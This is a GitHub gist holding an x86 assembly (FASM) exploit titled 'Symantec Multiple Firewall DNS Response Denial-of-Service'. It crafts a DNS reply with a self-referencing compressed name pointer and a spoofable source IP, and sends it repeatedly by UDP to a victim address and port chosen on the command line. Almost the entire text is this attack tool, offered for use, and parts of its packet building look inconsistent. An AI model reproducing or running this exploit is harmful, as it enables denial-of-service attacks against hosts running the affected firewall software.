Skip to content

Instantly share code, notes, and snippets.

@farhadshiri

farhadshiri/exploit.asm

Last active January 7, 2023 19:37
Show Gist options
  • Star 3 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save farhadshiri/b37fafe87e09178e8a606da12a867eea to your computer and use it in GitHub Desktop.
Save farhadshiri/b37fafe87e09178e8a606da12a867eea to your computer and use it in GitHub Desktop.
Download ZIP
DNS Response Denial-of-Service
Raw
exploit.asm
; HOD-symantec-firewall-DoS-expl.asm:
; Symantec Multiple Firewall DNS Response Denial-of-Service
; -------------------------------------------------------------------
; By f.shiri 2020
; farhad.shiri.ex@gmail.com
; -------------------------------------------------------------------
; Tested on:
; - Symantec Norton Personal Firewall
; Systems Affected:
; -------------------------------------------------------------------
; Assembler:
; Flat assembler(Fasm) or NetWide Assembler(Nasm)
; OS:
; windows x86/64 consol base program
; CPU Architect:
; IA x86/64 , AMD x86/64
; Libs:
; winsock2 , windows standard API
; -------------------------------------------------------------------
; Command Line Parameters/Arguments:
; HOD-symantec-firewall-DoS-expl [-fi:str] [-tp:int] [-ti:str] [-n:int]
;
; -fi:IP From (sender) IP address
; -tp:int To (recipient) port number
; -ti:IP To (recipient) IP address
; -n:int Number of times to send message
format PE console
entry main
;include win32 macro and constant in FASM header file.
include 'win32ax.inc'
;##-Constant section-######################################################;
MAX_MESSAGE =4068
MAX_PACKET =4096
MAX_INPUT_SIZE =20h
DEFAULT_PORT =500
DEFAULT_PORT_DNS=53 ;DNS port
DEFAULT_COUNT =10
VALUE_OK =1
IPPROTO_UDP =17 ;refered to ws2def.h in windows socket api
IPPROTO_IP =0 ;refered to ws2def.h in windows socket api
SOCKET_ERROR =-1
TRUE =1
DNSREPLYLEN =14
SIZEOF_LONG =4
TTL =128
IP_SIZE =16
;##-Data section-######################################################;
section ".data" readable writeable
Byte equ db
Word equ dw
Long equ dd
; /* Define the DNS header */
_dnsreply Byte "\xc9\x9c",\ ;/* Transaction ID */
"\x80\x00",\ ;/* Flags (bit 15: response) */
"\x00\x01",\ ;/* Number of questions */
"\x00\x01",\ ;/* Number of answer RRs */
"\x00\x00",\ ;/* Number of authority RRs */
"\x00\x00",\ ;/* Number of additional RRs */
"\xC0\x0C" ;/* Compressed name pointer to itself */
wsadata WSADATA
_sock Long 0
_remote sockaddr_in
;_bOpt dd 0
;/* Define the IP header */
struct IP_HDR
ip_verlen db ? ;/* IP version & length */
ip_tos db ? ;/* IP type of service */
ip_ttl db ? ;/* Time to live */
ip_protocol db ? ;/* Protocol */
ip_totallength dw ? ;/* Total length */
ip_id dw ? ;/* Unique identifier */
ip_offset dw ? ;/* Fragment offset field */
ip_checksum dw ? ;/* IP checksum */
ip_srcaddr dd ? ;/* Source address */
ip_destaddr dd ? ;/* Destination address */
ends
_ipHdr IP_HDR
;/* Define the UDP header */
struct UDP_HDR
src_portno dw ? ;/* Source port number */
dst_portno dw ? ;/* Destination port number */
udp_length dw ? ;/* UDP packet length */
udp_checksum dw ? ;/* UDP checksum (optional) */
ends
struct in_addr
union
struct
struct
s_b1 db ?
s_b2 db ?
s_b3 db ?
s_b4 db ?
ends
struct
s_w1 dw ?
s_w2 dw ?
ends
S_addr dd ?
ends
ends
ends
_addr in_addr
_udpHdr UDP_HDR
jumptable: Long case0-switchRefpoint, case1-switchRefpoint,case2-switchRefpoint
_iToPort Word 0 ;Port to send to
_iFromPort Word 0 ;Port to send from (spoof)
;##-bss section-######################################################;
section '.bss' readable writeable
CR equ 0xd
LF equ 0xa
NULL equ 0
_lineFeeder Byte "",CR,LF
_debugStrHex Byte "%x",LF,CR,NULL
_argStr Byte 128 dup(?),LF,CR,NULL
_argc dd 0
_progname Byte 15 dup(?),LF,CR,NULL
_output_handle Long ? ;pointer to std handle in windows kernel
_bytes_written Long ? ; Amount of bytes written
_input_str Byte MAX_INPUT_SIZE dup (?) ; The input string we read from the console
_new_line Byte LF,CR,NULL
_help_str1 Byte "Usage:",LF,CR,NULL
_help_str2 Byte "%s <-fi:SRC-IP> <-ti:VICTIM-IP> [-tp:DST-PORT] [-n:int]",LF,CR,NULL
_help_str3 Byte " -fi:IP From (sender) IP address (necessary)",LF,CR,NULL
_help_str5 Byte " -tp:int To (recipient) open UDP port number:",LF,CR,NULL
_help_str6 Byte " 137, 138, 445, 500 (necessary = [default 500] )",LF,CR,NULL
_help_str4 Byte " -ti:IP To (recipient) IP address (optional = [default 10.0.0.1] )",LF,CR,NULL
_help_str7 Byte " -n:int Number of times (optional = [default 10] )",LF,CR,NULL
_default_ip Byte "10.0.0.1",NULL
_wsa_sart_err_msg Byte "[-] WSAStartup() failed: %d",LF,CR,NULL
_wsa_socket_err_msg Byte "[-] WSASocket() failed: %d",LF,CR,NULL
_openSocketString Byte "[+] Socket opened in Handle num:(%d)",LF,CR,NULL
_wsa_sendto_err_msg Byte "[-] WSASocket() send failed: %d",LF,CR,NULL
_sentBytesMsg Byte "[+] Sent %d bytes",LF,CR,NULL
_InfoMsg1 Byte "[*] From IP: <%s>, port: %d ",LF,CR,NULL
_InfoMsg2 Byte "[*] To IP: <%s>, port: %d ",LF,CR,NULL
_InfoMsg3 Byte "[*] Count: %d",LF,CR,NULL
_DDosMsg Byte "Symantec Multiple Firewall DNS Response Denial-of-Service exploit v0.1",LF,CR,NULL
_dwToIPStr Byte IP_SIZE dup(?),NULL ;String IP to send to
_dwFromIPStr Byte IP_SIZE dup(?),NULL ;String IP to send from (spoof)
_dwToIP Long 0 ;IP to send to
_dwFromIP Long 0 ;IP to send from (spoof)
_iToPortStr Byte 6 dup(?),NULL ;Port to send to
_iFromPortStr Byte 6 dup(?),NULL ;Port to send from (spoof)
_dwCount Long 0 ;Number of times to send
_strMessage Byte MAX_MESSAGE dup(?) ;Message to send
;_optval Byte 50 dup(?)
_iTotalSize Word 0
_iUdpChecksumSize Word 0
_cksum Word 0
_buf Byte MAX_PACKET dup(?),0
;##-code section-######################################################;
section ".text" readable writeable executable
;//------------------------------------------------------------------------------\\;
strlen:
push ebp
mov ebp , esp
mov edi , dword [ebp + 8]
xor edx , edx
.loop:
add edx , 1
cmp byte [edi+ edx - 1] , 0
jnz .loop
mov esp , ebp
pop ebp
ret 4
;//------------------------------------------------------------------------------\\;
my_printf:
push esi edi ebp
mov ebp , esp
mov esi , dword[ebp + 0x10] ;arg1: pointer to string show in consol
mov edx , 4
push esi
.if eax = VALUE_OK
mov edi , dword[ebp + 0x14] ;arg2: pointer to string show in consol
add edx , 4
push edi
.endif
stdcall [printf]
add esp ,edx
mov esp , ebp
pop ebp edi esi
.if eax=VALUE_OK
ret 8 ;stdcall convention
.endif
ret 4 ;stdcall convention
;//------------------------------------------------------------------------------\\;
show_std:
push ebp
mov ebp , esp
mov esi , dword[ebp + 8] ;arg1: pointer to string show in consol
sub esp , 4
mov dword[esp] , esi
stdcall strlen
; arg1 : lpOverlapped
; arg2 : lpNumberOfBytesWritten
; arg3 : nNumberOfBytesToWrite
; arg4 : lpBuffer
; arg5 : hFile
;invoke WriteFile , 0 , bytes_written , edx , esi , output_handle
mov esp , ebp
pop ebp
ret 4 ;stdcall convention
;//------------------------------------------------------------------------------\\;
print_ebx:
pushad
jmp .print_ebx_after_data ; Skip over the local data:
.print_ebx_fmt Byte "%x",10,13,0
.print_ebx_after_data:
ccall [printf],.print_ebx_fmt,ebx
popad ; Restore all registers.
ret
;//------------------------------------------------------------------------------\\;
usage:
push ebp
mov ebp , esp
sub esp , 4 ;micro op code
lea edi , dword[_new_line + 0]
mov dword[esp] , edi
stdcall my_printf
lea edi , dword[_help_str1 + 0]
sub esp , 4
mov [esp] , edi
stdcall my_printf
mov eax , VALUE_OK
mov edi , dword[ebp + 8] ; arg1: progname string
push _help_str2 edi
stdcall my_printf
lea edi , dword[_help_str3 + 0]
sub esp , 4
mov [esp] , edi
stdcall my_printf
lea edi , dword[_help_str4 + 0]
sub esp , 4
mov [esp] , edi
stdcall my_printf
lea edi , dword[_help_str5 + 0]
sub esp , 4
mov [esp] , edi
stdcall my_printf
lea edi , dword[_help_str6 + 0]
sub esp , 4
mov [esp] , edi
stdcall my_printf
lea edi , dword[_help_str7 + 0]
sub esp , 4
mov [esp] , edi
stdcall my_printf
mov esp , ebp
pop ebp
ret 4
;//------------------------------------------------------------------------------\\;
checksum: ;checksum(WORD *buffer, SDWORD size)
.balanceStack equ 4
.offsetLocal equ -4
.size_ushort equ 2
push ebp
mov ebp , esp
sub esp , 4 ;get shadow space
lea edx,[ebp + .offsetLocal * 1]
mov dword [edx] , 0 ;LWORD cksum=0;
;esi -> point to buffer size
lea esi , dword [_iUdpChecksumSize]
lea edi , dword [_buf]
xor ecx , ecx
while_loop: ;while (size > 1){
sub dword[esi] , .size_ushort
jl .end_loop
movzx eax , word[edi + ecx]
lock add dword[edx] , eax
inc ecx
jmp while_loop
.end_loop:
xor eax , eax
cmp dword[edx] , 0x0
jz .else_if
mov al , byte [edi + 0]
lock add dword [edx] , eax
.else_if:
shr dword [edx] , 16
and dword [edx] , 0xffff
mov eax , dword [edx]
add dword [edx] , eax
shr dword [edx] , 16
mov eax , dword [edx]
add dword [edx] , eax
not dword [edx]
mov eax , dword [edx]
add esp , .balanceStack ;balance the stack
pop ebp
ret
;//------------------------------------------------------------------------------\\;
parseCmdArgs:
.localShadowSpace equ 25 * 4 ;temp local var space needed
.balanceStack equ 25 * 4 ;temp local var (8*4)*4=128 , other local 1*4=4
.offsetLocal equ -4
.spaceChar equ 0x20
push ebp
mov ebp , esp
sub esp , .balanceStack
lea edi , [ebp + .offsetLocal * 1] ;pointer to local argc
lea esi , [_argStr] ;source
mov word [_iToPort] , DEFAULT_PORT
mov word [_iFromPort] , DEFAULT_PORT_DNS
stdcall getNetworkAddr,_default_ip ;pointer to network addr into temp var
;mov edx , dword [_default_ip]
mov dword [_dwToIP] , eax ;inet_addr(DEFAULT_IP)
mov dword [_dwFromIP] , eax ;inet_addr(DEFAULT_IP)
mov dword [_dwCount] , DEFAULT_COUNT
stdcall [memcpy],_strMessage,_dnsreply,DNSREPLYLEN
stdcall [GetCommandLineA]
stdcall [CommandLineToArgvW],eax,edi
stdcall [wvsprintfA],esi,'%s',eax
sub esp , 4 ;micro op
mov dword [esp] , esi
stdcall strlen ;lenght of string in to edx
mov byte [esi + edx + 1] , .spaceChar ;insert end of array one space char
mov byte [esi + edx + 2] , LF ;insert end of array one line feed char
cmp edx , 35
jnae .endParser
lea esi , [_argStr]
lea edi , [ebp - .localShadowSpace] ;25 * 4 equ 100 byte pointer to local var
xor eax , eax
xor edx , edx
mov ecx , 0x15 ;string array len is 20 = 5 * 4 dword
._extractLoop:
sub ecx , 1 ;array index counter
lodsb
stosb
cmp al , .spaceChar
jnz ._extractLoop
sub edi , 1
cmp edx , 0
je .oneSpaceRemoved
._nullByte:
test ecx , ecx
je ._outExtractLoop
mov byte[edi] , 0
add edi , 1
sub ecx , 1
jnz ._nullByte
._outExtractLoop:
mov ecx , 0x15
add edx , 1 ;arg counter
cmp byte [esi] , LF
jnz ._extractLoop
lea ax , word [0 * 5] ;argv[0] = binary file name
lea edi , [ebp - .localShadowSpace]
lea edi , dword [edi + 4 * eax] ;Base:edi , Index:4 , Scale:eax
pushad
ccall [memcpy],_progname,edi,15
popad
mov [_argc] , edx
cmp [_argc] , 5
jnz .endParser
;extract argument values argv[1]..argv[4]
xor eax , eax
mov ecx , 1
._argCntForLoop:
lea ax , word [ecx * 5] ; 1=index of array -- 3=array length(5 * 4) because dword is 4
lea esi , [ebp - .localShadowSpace]
lea esi , dword [esi + 4 * eax]
mov al , byte [esi]
cmp al , 0x2d ;argv[i][0] == '-'
jnz .ifswichelse
pushad
call switchArgs
popad
.ifswichelse:
add ecx , 1
cmp ecx , 5
jne ._argCntForLoop
.endParser:
add esp , .balanceStack ;balance the stack
mov esp , ebp
pop ebp
ret
.oneSpaceRemoved:
add esi , 1
jmp ._nullByte
;//------------------------------------------------------------------------------\\;
switchArgs: ;This function implements a switch statement
.indexSize equ 1
.scaleSize equ 4
.lowerCaseMask equ 0x20
.isNumberCaseMask equ 0x30
movzx eax , byte [esi + .indexSize * 1]
or al , .lowerCaseMask ;tolower(al)
cmp al , 0x66 ;argv[i][1] == 'f'
jz .getCaseAddress
cmp al , 0x74 ;argv[i][1] == 't'
jz .getCaseAddress
cmp al , 0x6e ;argv[i][1] == 'n'
jz .getCaseAddress
ret
.getCaseAddress:
;calculate switch/case jump address
;switch/case implemented by Position Independent code, not needed GOT address.
shr al , 3 ; al >> 3
sub al , 0xc ; al - 12 = 0 if 0x66 or 1 if 0x6e or 2 if 0x74
call get_thunk_ecx ; get ecx = eip because can not direct access to eip reg
switchRefpoint:
cmp eax, 3
jnb case_default ; index out of range
mov eax, [ecx + eax * .scaleSize + jumptable - switchRefpoint] ; read table entry
add eax, ecx ; The jump addresses are relative to refpoint, get absolute address
jmp eax ; jump to desired case
case0: ; ascii 'f' = 102
mov al , byte [esi + .indexSize * 2] ;argv[i][2] == 'i'
or al , .lowerCaseMask ;tolower(al)
cmp al , 0x69 ;argv[i][2] == 'i'
jnz .OtherWise
movzx ax , byte [esi + .scaleSize * .indexSize]
test al , .isNumberCaseMask ;if(argv[i][4] is number)
jnp .OtherWise ;break
add esi , .scaleSize ;start index of src IP in array
lea edi , [_dwFromIPStr];dest array
.fiIpLoop:
lodsb
cmp al , NULL
jz .endfiIpLoop
stosb
jmp .fiIpLoop
.endfiIpLoop:
stdcall getNetworkAddr,_dwFromIPStr ;pointer to network addr into temp var
;mov eax , dword [_dwFromIPStr] ;can be write into _dwFromIPStr param because this is pointer to pointer!
mov dword [_dwFromIP] , eax ;convert string ip to integer ip
sub esi , .scaleSize
ret
.OtherWise:
jmp case_default
case1: ; ascii 'n' = 110
.time_temp equ -24
.shadowSpace equ 4*6
push ebp
mov ebp , esp
sub esp , .shadowSpace
lea edi , [ebp + .time_temp * 1] ;pointer to local array
add esi , 3 ;start index of time array
mov al , byte [esi]
test al , .isNumberCaseMask ;if(argv[i][4] is number)
jnp .OtherWise ;break
.fiIpLoop:
lodsb
cmp al , LF
jz .endfiIpLoop
cmp al , NULL
jz .endfiIpLoop
mov byte [edi + 1] , al
mov [edi] , al
add edi , 1
jmp .fiIpLoop
.endfiIpLoop:
mov byte [edi] , NULL
lea edi , [ebp + .time_temp * 1] ;again point to first index to local array
ccall [atol],edi
mov dword [_dwCount] , eax
.OtherWise:
add esp , .shadowSpace
mov esp , ebp
pop ebp
ret
case2: ; ascii 't' = 116
movzx ax , byte [esi + .scaleSize * .indexSize]
test al , .isNumberCaseMask ;if(argv[i][4] is number)
jnp .OtherWise ;break
mov al , byte [esi + .indexSize * 2]
or al , .lowerCaseMask ;tolower(al)
cmp al , 0x69 ;argv[i][2] == 'i'
jnz .ElseIfOtherChar
add esi , .scaleSize ;start index of dest IP array
lea edi , [_dwToIPStr] ;dest array
.tiIpLoop:
lodsb
cmp al , NULL
jz .endtiIpLoop
stosb
jmp .tiIpLoop
.endtiIpLoop:
stdcall getNetworkAddr,_dwToIPStr ;pointer to network addr into temp var
;mov eax , dword [_dwToIPStr] ;can be write into _dwFromIPStr param because this is pointer to pointer!
mov dword [_dwToIP] , eax
sub esi , .scaleSize
ret
.ElseIfOtherChar:
cmp al , 0x70 ;argv[i][2] == 'p'
jnz .OtherWise
add esi , .scaleSize ;start index of src port array
lea edi , [_iToPortStr] ;dest array
.tpPortLoop:
lodsb
cmp al , NULL
jz .endtpPortLoop
stosb
jmp .tpPortLoop
.endtpPortLoop:
ccall [atoi] , _iToPortStr
mov word [_iToPort] , ax
sub esi , .scaleSize
ret
.OtherWise:
jmp case_default
case_default:
stdcall usage,_progname ;usage(argv[0]);
ret
get_thunk_ecx: ;Function for reading instruction pointer
mov ecx, [esp]
ret
;//------------------------------------------------------------------------------\\;
validateArgs:
.loffset equ -4
push ebp
mov ebp , esp
sub esp , 4
lea edx,[ebp + .loffset * 1]
stdcall parseCmdArgs
;debug message
;mov ebx , dword [_argc]
;stdcall print_ebx
;ccall [printf],'%d - %s',[_argc],_argStr
cmp dword [_argc] , 3 ;if (argc < 3)
jl .elseIf
stdcall initSocket
jmp .endValidFunc
.elseIf:
stdcall usage,_progname ;usage(argv[0]);
.endValidFunc:
add esp , 4 ;balance the stack
pop ebp
ret
;//------------------------------------------------------------------------------\\;
getNetworkAddr: ;void getNetwordAddr(int** net_addr)
push ebp
mov ebp , esp
mov edi , dword [ebp + 0x8] ;arg2 -> net_addr
stdcall [inet_addr],edi ;get network addr byte
;mov dword [edi] , eax ;*net_addr = eax write the offset
mov esp , ebp
pop ebp
ret 4
;//------------------------------------------------------------------------------\\;
showInConsol: ;void showInConsol(char* msg , int lasterror)
push ebp
mov ebp , esp
mov esi , dword [ebp + 8] ; arg1: lasterror int num
mov edi , dword [ebp + 0xc] ; arg2: msg string
ccall [printf], edi,esi
mov esp , ebp
pop ebp
ret 8
;//------------------------------------------------------------------------------\\;
dieWithMessage:
push ebp
mov ebp , esp
mov esi , dword [ebp + 8]
stdcall [WSAGetLastError]
stdcall showInConsol ,eax,esi ;eax = last error num
pop ebp
ret 4
;//------------------------------------------------------------------------------\\;
proc initSocket ; void initSocket();
local _netPort:DWORD,_sizeIpHdr:DWORD,_sizeUdpHdr:DWORD,_iIPSize:WORD,_iUdpSize:WORD
;addr.S_un.S_addr = dwFromIP;
;mov [_addr.S_addr] , edx ;_dwFromIP
;ccall [inet_ntoa] , _addr
movzx eax , word [_iFromPort] ;becuase printf call by value when use %d
pushad
stdcall [printf],_InfoMsg1,_dwFromIPStr, eax ;printf call by pointer when use %s
add esp , 0xc ;after the printf function needed balance the stack
popad
movzx eax , word [_iToPort]
pushad
stdcall [printf],_InfoMsg2,_dwToIPStr , eax
add esp , 0xc
popad
pushad
stdcall [printf],_InfoMsg3,dword [_dwCount]
add esp , 0x8
popad
stdcall [WSAStartup],0101h,wsadata ;WSAStartup(MAKEWORD(2,2), &wsd)
cmp eax , 0 ;WSAStartup() != 0
je .else_start
.if_start:
stdcall dieWithMessage ,_wsa_sart_err_msg
ret
.else_start:
stdcall [closesocket], _sock
stdcall [socket],AF_INET,SOCK_DGRAM,IPPROTO_UDP
cmp eax,SOCKET_ERROR ;if(sock == -1)
jne .else_socket
.if_socket:
stdcall dieWithMessage,_wsa_socket_err_msg
ret
.else_socket:
mov [_sock],eax ;socket handle number
mov eax , VALUE_OK
push _openSocketString [_sock]
stdcall my_printf
;mov dword [_bOpt] , TRUE
;lea edi , dword[optval]
;mov byte[edi + 0] , TRUE
;invoke setsockopt,[sock], IPPROTO_IP, IP_TTL, optval , 4
;cmp eax,SOCKET_ERROR
;je .if_setSock
;jmp .else_setSock
;.if_setSock:
; call dieWithMessage
; ret
;.else_setSock:
;ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (const signed char *)&bOpt, sizeof(bOpt));
;/* Initalize the IP header */
xor ebx , ebx
mov [_sizeIpHdr] , sizeof.IP_HDR
mov [_sizeUdpHdr] , sizeof.UDP_HDR
add bx , word [_sizeIpHdr]
add bx , word [_sizeUdpHdr]
add bx , DNSREPLYLEN
mov [_iTotalSize] , bx
mov word[_iIPSize] , 0
mov ax , word [_sizeIpHdr]
mov bl , SIZEOF_LONG
div bl
mov byte [_iIPSize] , bl
mov eax , 4
shl eax , 4
or ax , word [_iIPSize]
mov word [_ipHdr.ip_verlen] , ax
mov [_ipHdr.ip_tos] , 0 ;/* IP type of service */
stdcall [htons],[_iTotalSize]
mov word [_ipHdr.ip_totallength] , ax ;/* Total packet len */
mov [_ipHdr.ip_id] , 0 ;/* Unique identifier: set to 0 */
mov [_ipHdr.ip_offset] , 0 ;/* Fragment offset field */
mov [_ipHdr.ip_ttl] , TTL ;/* Time to live */
mov [_ipHdr.ip_protocol] , PF_NETBIOS ;/* Protocol(UDP) = 0x11 */
mov [_ipHdr.ip_checksum] , 0 ;/* IP checksum */
mov eax , dword [_dwFromIP] ;pointer to from IP
mov dword [_ipHdr.ip_srcaddr] , eax ;/* Source address */
mov eax , dword [_dwToIP] ;pointer to to IP
mov dword [_ipHdr.ip_destaddr] , eax ;/* Destination address */
;/* Initalize the UDP header */
xor ebx , ebx
add bx , word[_sizeUdpHdr]
add bx , DNSREPLYLEN
mov word [_iUdpSize] , bx
stdcall [htons],[_iFromPort]
mov dword [_udpHdr.src_portno] , eax
stdcall [htons],[_iToPort]
mov dword [_udpHdr.dst_portno] , eax
stdcall [htons],[_iUdpSize]
mov dword [_udpHdr.udp_length] , eax
mov [_udpHdr.udp_checksum] , 0
mov [_iUdpChecksumSize] , 0
lea esi , dword [_iUdpChecksumSize]
lea edi , dword [_buf] ;edi = &_buf
stdcall [memset],edi,0,MAX_PACKET
stdcall [memcpy],edi,_ipHdr.ip_srcaddr,sizeof.IP_HDR.ip_srcaddr ;edi = edi + 0 -> point to begin offset
add dword [esi] , sizeof.IP_HDR.ip_srcaddr
add edi , sizeof.IP_HDR.ip_destaddr ;edi = edi + 4
stdcall [memcpy],edi,_ipHdr.ip_destaddr,sizeof.IP_HDR.ip_destaddr
add dword [esi] , sizeof.IP_HDR.ip_destaddr ;iUdpChecksumSize += sizeof(ipHdr.ip_destaddr)
add dword [esi] , 1 ;iUdpChecksumSize += 1;
add edi , 4 ;edi = edi + 4
stdcall [memcpy],edi,_ipHdr.ip_protocol,sizeof.IP_HDR.ip_protocol
add edi , sizeof.IP_HDR.ip_protocol ;edi = edi + 1
xor eax , eax
add word [esi] , sizeof.IP_HDR.ip_protocol ;iUdpChecksumSize += sizeof(ipHdr.ip_protocol)
stdcall [memcpy],edi,_udpHdr.udp_length,sizeof.UDP_HDR.udp_length
add edi , sizeof.UDP_HDR.udp_length ;edi = edi + 2
add word [esi] , sizeof.UDP_HDR.udp_length ;iUdpChecksumSize += sizeof(ipHdr.udp_length)
stdcall [memcpy],edi,_udpHdr,sizeof.UDP_HDR
add edi , sizeof.UDP_HDR ;edi = edi + 8
add word [esi] , sizeof.UDP_HDR
stdcall [memcpy],_strMessage,_dnsreply,DNSREPLYLEN
mov ecx , -1 ;i=0
.for_copyMsg:
inc ecx ;i++
xor eax , eax
mov al , byte [_strMessage + ecx] ; al = strMessage[i]
mov byte [edi + ecx] , al ; *buf[i] = al
cmp ecx , DNSREPLYLEN ; i < sizeof(dnsreply)
jnz .for_copyMsg
add word [esi] , DNSREPLYLEN
stdcall checksum
mov [_udpHdr.udp_checksum] , ax ;eax = return checksum value from checksum()
stdcall [memcpy],edi,_ipHdr,sizeof.IP_HDR
add edi , sizeof.IP_HDR ;edi = edi + sizeof.IDP_HDR
stdcall [memcpy],edi,_udpHdr,sizeof.UDP_HDR
add edi , sizeof.UDP_HDR ;edi = edi + UDP_HDR
stdcall [memcpy],edi,_strMessage,DNSREPLYLEN
mov [_remote.sin_family] , AF_INET
stdcall [htons],[_iToPort]
mov word [_iToPort] , ax
mov [_remote.sin_port] , ax ;htons(iToPort)
mov eax , dword [_dwToIP]
mov [_remote.sin_addr] , eax ;dwToIP
mov esi , dword [_remote]
xor ebx , ebx
;_sock = socket handle number
;_buf = buffer to sending to udp
;_iTotalSize = size of buffer
;esi = pointer to sockaddr_in structure
.forSendTo:
stdcall [sendto],[_sock],_buf,[_iTotalSize],0,esi,sizeof.sockaddr_in
cmp eax,SOCKET_ERROR ;if(sending byte == -1)
jne .else_sendto
.if_sendto:
stdcall dieWithMessage, _wsa_sendto_err_msg
jmp .endFor
.else_sendto:
stdcall showInConsol,eax, _sentBytesMsg ;eax = last error num
add ebx , 1
cmp ebx ,[_dwCount]
jne .forSendTo
.endFor:
stdcall [closesocket], _sock
stdcall [WSACleanup]
;infinite loop
;char* ptr = new char[5];
;for(int i = 0 ; i < strlen(_buf)+1 ; i+=4 ){
; *ptr = _buf[i];
; *(ptr + 1)= _buf[i+1];
; *(ptr + 2)= _buf[i+2];
; *(ptr + 3)= _buf[i+3];
; *(ptr + 4)= '\0';
; std::cout << ptr << '\n';
;}
;show content of array _buf
xor ecx , ecx
lea edi , dword [_buf]
movzx edx , word [_iTotalSize]
.loopShow:
movzx ebx , word [edi + ecx]
ccall print_ebx
add ecx , 2
cmp ecx , edx
jnz .loopShow
ret
endp
;//------------------------------------------------------------------------------\\;
main:
push ebp
mov ebp , esp
ccall [printf],_DDosMsg,CR,LF
stdcall validateArgs
;Obtain output handle
;stdcall [GetStdHandle] , STD_OUTPUT_HANDLE
;mov dword [output_handle],eax
;sub esp , 4
;mov dword[esp] , eax
;stdcall show_std
;mov eax , dword[ebp + 8]
pop ebp
push 0
call [ExitProcess]
;##-include API section-######################################################;
section '.idata' import data readable
library kernel,'KERNEL32.DLL',\
msvcrt,'MSVCRT.DLL',\
winsock,'WSOCK32.DLL',\
shell32,'SHELL32.dll',\
User32,'USER32'
import User32,\
wvsprintfA,'wvsprintfA'
import kernel,\
ExitProcess,'ExitProcess',\
GetStdHandle,'GetStdHandle',\
GetCommandLineA,'GetCommandLineA',\
lstrlenA,'lstrlenA',\
GetCommandLineW,'GetCommandLineW'
import msvcrt,\
printf, 'printf',\
memset, 'memset',\
memcpy, 'memcpy',\
atoi , 'atoi' ,\
atol , 'atol' ,\
strtoul, 'strtoul'
import winsock,\
WSAStartup,'WSAStartup',\
WSACleanup,'WSACleanup',\
WSAAsyncSelect,'WSAAsyncSelect',\
inet_addr,'inet_addr',\
WSAGetLastError,'WSAGetLastError',\
gethostbyname,'gethostbyname',\
socket,'socket',\
setsockopt,'setsockopt',\
htons,'htons',\
bind,'bind',\
listen,'listen',\
accept,'accept',\
connect,'connect',\
recv,'recv',\
send,'send',\
sendto,'sendto',\
inet_ntoa, 'inet_ntoa',\
closesocket,'closesocket'
include '/API/SHELL32.INC'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment